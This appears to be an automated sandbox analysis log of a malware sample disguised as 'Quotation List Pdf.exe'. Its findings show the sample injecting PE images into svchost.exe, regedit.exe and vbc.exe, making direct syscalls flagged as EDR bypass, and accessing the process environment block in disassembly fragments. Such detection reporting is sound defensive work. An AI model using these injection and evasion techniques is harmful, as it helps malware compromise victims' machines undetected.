Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h] 5_2_058A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h] 5_2_058A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A4144 mov ecx, dword ptr fs:[00000030h] 5_2_058A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h] 5_2_058A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h] 5_2_058A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05817152 mov eax, dword ptr fs:[00000030h] 5_2_05817152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05816154 mov eax, dword ptr fs:[00000030h] 5_2_05816154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05816154 mov eax, dword ptr fs:[00000030h] 5_2_05816154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580C156 mov eax, dword ptr fs:[00000030h] 5_2_0580C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E5152 mov eax, dword ptr fs:[00000030h] 5_2_058E5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h] 5_2_0580F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058A9179 mov eax, dword ptr fs:[00000030h] 5_2_058A9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581208A mov eax, dword ptr fs:[00000030h] 5_2_0581208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580D08D mov eax, dword ptr fs:[00000030h] 5_2_0580D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583D090 mov eax, dword ptr fs:[00000030h] 5_2_0583D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583D090 mov eax, dword ptr fs:[00000030h] 5_2_0583D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05815096 mov eax, dword ptr fs:[00000030h] 5_2_05815096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0584909C mov eax, dword ptr fs:[00000030h] 5_2_0584909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D60B8 mov eax, dword ptr fs:[00000030h] 5_2_058D60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D60B8 mov ecx, dword ptr fs:[00000030h] 5_2_058D60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h] 5_2_058270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058920DE mov eax, dword ptr fs:[00000030h] 5_2_058920DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E50D9 mov eax, dword ptr fs:[00000030h] 5_2_058E50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058390DB mov eax, dword ptr fs:[00000030h] 5_2_058390DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0580A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058350E4 mov eax, dword ptr fs:[00000030h] 5_2_058350E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058350E4 mov ecx, dword ptr fs:[00000030h] 5_2_058350E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058180E9 mov eax, dword ptr fs:[00000030h] 5_2_058180E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580C0F0 mov eax, dword ptr fs:[00000030h] 5_2_0580C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058520F0 mov ecx, dword ptr fs:[00000030h] 5_2_058520F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h] 5_2_0582E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h] 5_2_0582E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h] 5_2_0582E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h] 5_2_0582E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580A020 mov eax, dword ptr fs:[00000030h] 5_2_0580A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580C020 mov eax, dword ptr fs:[00000030h] 5_2_0580C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D903E mov eax, dword ptr fs:[00000030h] 5_2_058D903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D903E mov eax, dword ptr fs:[00000030h] 5_2_058D903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D903E mov eax, dword ptr fs:[00000030h] 5_2_058D903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058D903E mov eax, dword ptr fs:[00000030h] 5_2_058D903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05812050 mov eax, dword ptr fs:[00000030h] 5_2_05812050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583B052 mov eax, dword ptr fs:[00000030h] 5_2_0583B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058B705E mov ebx, dword ptr fs:[00000030h] 5_2_058B705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058B705E mov eax, dword ptr fs:[00000030h] 5_2_058B705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E5060 mov eax, dword ptr fs:[00000030h] 5_2_058E5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583C073 mov eax, dword ptr fs:[00000030h] 5_2_0583C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov ecx, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05821070 mov eax, dword ptr fs:[00000030h] 5_2_05821070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h] 5_2_0580E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h] 5_2_0580E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h] 5_2_0580E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583438F mov eax, dword ptr fs:[00000030h] 5_2_0583438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0583438F mov eax, dword ptr fs:[00000030h] 5_2_0583438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058E539D mov eax, dword ptr fs:[00000030h] 5_2_058E539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05808397 mov eax, dword ptr fs:[00000030h] 5_2_05808397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05808397 mov eax, dword ptr fs:[00000030h] 5_2_05808397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05808397 mov eax, dword ptr fs:[00000030h] 5_2_05808397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0586739A mov eax, dword ptr fs:[00000030h] 5_2_0586739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0586739A mov eax, dword ptr fs:[00000030h] 5_2_0586739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058433A0 mov eax, dword ptr fs:[00000030h] 5_2_058433A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058433A0 mov eax, dword ptr fs:[00000030h] 5_2_058433A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058333A5 mov eax, dword ptr fs:[00000030h] 5_2_058333A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CC3CD mov eax, dword ptr fs:[00000030h] 5_2_058CC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0581A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h] 5_2_058183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h] 5_2_058183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h] 5_2_058183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h] 5_2_058183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CB3D0 mov ecx, dword ptr fs:[00000030h] 5_2_058CB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058CF3E6 mov eax, dword ptr fs:[00000030h] 5_2_058CF3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h] 5_2_058203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h] 5_2_058203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h] 5_2_058203E9
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768438130 RtlAddVectoredExceptionHandler,RaiseFailFastException, 0_2_00007FF768438130
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76849B70C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF76849B70C

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory allocated: C:\Windows\regedit.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtCreateMutant: Direct from: 0x774635CC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtWriteVirtualMemory: Direct from: 0x77462E3C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtMapViewOfSection: Direct from: 0x77462D1C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtResumeThread: Direct from: 0x774636AC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtProtectVirtualMemory: Direct from: 0x77462F9C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtSetInformationProcess: Direct from: 0x77462C5C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtSetInformationThread: Direct from: 0x774563F9 Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtClose: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtNotifyChangeKey: Direct from: 0x77463C2C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQueryInformationProcess: Direct from: 0x77462C26 Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtResumeThread: Direct from: 0x77462FBC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtReadFile: Direct from: 0x77462ADC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQuerySystemInformation: Direct from: 0x77462DFC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtDelayExecution: Direct from: 0x77462DDC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtCreateUserProcess: Direct from: 0x7746371C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtWriteVirtualMemory: Direct from: 0x7746490C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtAllocateVirtualMemory: Direct from: 0x774648EC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQuerySystemInformation: Direct from: 0x774648CC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtReadVirtualMemory: Direct from: 0x77462E8C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtCreateKey: Direct from: 0x77462C6C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtSetInformationThread: Direct from: 0x77462B4C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQueryAttributesFile: Direct from: 0x77462E6C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtDeviceIoControlFile: Direct from: 0x77462AEC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtOpenSection: Direct from: 0x77462E0C Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtCreateFile: Direct from: 0x77462FEC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtOpenFile: Direct from: 0x77462DCC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtQueryInformationToken: Direct from: 0x77462CAC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtTerminateThread: Direct from: 0x77462FCC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe NtOpenKeyEx: Direct from: 0x77462B9C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: NULL target: C:\Windows\SysWOW64\PING.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and write Jump to behavior
